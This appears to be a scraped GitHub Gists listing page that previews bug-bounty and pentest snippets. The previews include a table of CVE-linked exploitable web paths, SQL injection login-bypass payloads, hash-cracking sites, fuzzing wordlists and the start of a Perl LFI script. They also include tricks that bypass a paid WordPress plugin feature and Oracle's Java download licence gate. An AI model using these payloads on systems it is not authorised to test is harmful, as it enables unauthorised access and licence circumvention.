Halim J. hxlxmj
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active October 8, 2025 15:50
easy wins - exploitable/leaky web paths
| Exploit/description | Path |
| --- | --- |
| Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
| CVE-2020-17519 | /jobmanager/logs/ |
| CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
| CVE-2018-1000130 | /jolokia |
| CVE-2018-1000130 | /actuator/jolokia |
| leak | /actuator/env |
@fuckup1337
fuckup1337 / JavascriptRecon.md
Created January 18, 2021 20:02
My Javascript Recon Process - BugBounty

Description

This is a simple guide to performing JavaScript recon in bug bounty.

Steps

  • The first step is to collect JavaScript files, possibly several (more files = more paths, parameters -> more vulns)
@spenkk
spenkk / sqli-auth-bypass.txt
Created November 17, 2020 14:10
SQL Injection Authentication Bypass payloads
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
@richlamdev
richlamdev / hash lookups
Last active March 2, 2026 12:21
Hash lookups online
LIST OF WEBSITES DEHASH / HASH ONLINE
https://crackstation.net/
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active April 20, 2026 01:12
Subdomain Wordlist
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active May 22, 2026 21:37
A list of 3203 common API endpoints and objects designed for fuzzing.
@giovanni-d
giovanni-d / allinonemigration.md
Last active May 8, 2026 17:53
All-in-One WP Migration - Restore From Server (without PRO version) - Restore

All-in-One WP Migration Restore From Server (without pro version)

If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionality that was present in version 6.77, open your browser's dev tools and run the code below in the console:

Last confirmed working: May 2025 on version 7.94

var filename = 'FILENAME.wpress';
@vijay922
vijay922 / LFI.pl
Created May 22, 2019 05:11 — forked from Kaizen1337/LFI.pl
LocalFile
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
system("title The JavaHaxor Group");
system("color 1e");
system ("cls");
print " |=======================================================|\n";
print " |= _ ______ _____ =|\n";
print " |= | | | ____|_ _| =|\n";
@wavezhang
wavezhang / java_download.sh
Last active May 20, 2026 20:33
download java from oracle without login
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn-pub/java/jdk/12.0.2+10/e482c34c86bd4bf8b56c0b35558996b9/jdk-12.0.2_linux-x64_bin.tar.gz